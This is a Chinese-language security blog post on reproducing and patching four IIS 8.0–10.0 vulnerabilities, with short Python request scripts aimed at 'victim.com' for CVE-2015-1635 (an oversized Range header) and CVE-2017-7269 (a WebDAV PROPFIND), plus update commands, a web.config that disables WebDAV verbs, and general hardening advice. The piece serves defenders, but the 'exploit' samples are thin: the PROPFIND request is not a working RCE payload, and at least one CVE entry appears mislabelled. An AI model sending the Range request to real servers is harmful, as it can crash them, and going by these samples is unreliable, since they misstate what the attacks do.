服务器 > 网络安全 > 脚本攻防

网络安全-IIS8.0-10.0漏洞复现和修复

74人参与 2024-08-03 脚本攻防

1. cve-2015-1635:http.sys 远程代码执行漏洞

利用示例

import requests

headers = {
    'range': 'bytes=0-18446744073709551615'
}

response = requests.get('http://victim.com', headers=headers)
print(response.status_code)

修复方法

# windows 更新命令
wuauclt /detectnow /updatenow
2. cve-2017-7269:webdav 远程代码执行漏洞

利用示例

import requests

payload = "<?xml version=\"1.0\"?><propfind xmlns=\"dav:\"><prop><propname/></prop></propfind>"
headers = {
    'content-length': str(len(payload)),
    'content-type': 'text/xml'
}

response = requests.request('propfind', 'http://victim.com', headers=headers, data=payload)
print(response.status_code)

修复方法

# 禁用 webdav 方法
<configuration>
   <system.webserver>
      <security>
         <requestfiltering>
            <verbs>
               <add verb="propfind" allowed="false" />
               <add verb="proppatch" allowed="false" />
               <add verb="mkcol" allowed="false" />
               <add verb="copy" allowed="false" />
               <add verb="move" allowed="false" />
               <add verb="lock" allowed="false" />
               <add verb="unlock" allowed="false" />
            </verbs>
         </requestfiltering>
      </security>
   </system.webserver>
</configuration>
3. cve-2019-0941:iis 身份验证绕过漏洞

修复方法

# windows 更新命令
wuauclt /detectnow /updatenow
4. cve-2018-12188:iis 安全功能绕过漏洞

修复方法

# windows 更新命令
wuauclt /detectnow /updatenow

综合防御措施

除了针对特定漏洞的修补,以下是一些综合的防御措施:

  1. 保持系统和软件更新:定期检查并安装微软发布的所有安全更新。
  2. 最小化攻击面:禁用不必要的 iis 功能和模块,例如 webdav,如果不使用的话。
  3. 启用防火墙和入侵检测系统(ids):配置防火墙规则,阻止不必要的端口和服务。使用 ids 监控和防范潜在的攻击。
  4. 应用安全配置:确保 iis 的安全配置按照最佳实践进行,例如使用 ssl/tls 加密通信,设置严格的权限和访问控制。
  5. 日志和监控:启用详细的日志记录,定期审查日志以检测和响应异常活动。
(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

用Firefox来Hacking Web 2.0程序(图)

10-08

网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你

08-02

黑客(网络安全)技术自学30天

08-02

2023年最新Kali安装教程(超详细,手把手教你下载安装kali虚拟机)

08-02

网络安全(黑客)——自学2024

08-02

网络安全(黑客)技术——自学2024

08-02

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论